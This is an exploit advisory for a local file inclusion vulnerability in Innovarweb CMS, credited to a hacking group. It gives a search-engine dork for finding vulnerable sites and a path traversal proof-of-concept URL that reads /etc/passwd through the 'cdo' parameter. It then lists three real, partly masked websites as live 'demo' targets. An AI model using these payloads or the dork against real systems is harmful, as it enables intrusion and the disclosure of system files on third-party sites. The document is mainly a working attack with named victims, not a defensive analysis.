# Exploit Title: Innovarweb CMS / Local File Inclusion
# Date: 31/08/2012
# Author: Daniel Godoy
# Author Mail:DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php
# Tested on: Linux
# Dork: allinurl:"index.php?cdo="
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
http://target/index.php?cdo=../../../../../../etc/passwd
[DEMO]
http://www.westXXXapitalinc.com/index.php?cdo=../../../../../../etc/passwd
http://www.arXXonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwd
http://www.suspeXXXXrlitos.com.ar/index.php?cdo=../../../../../../etc/passwd
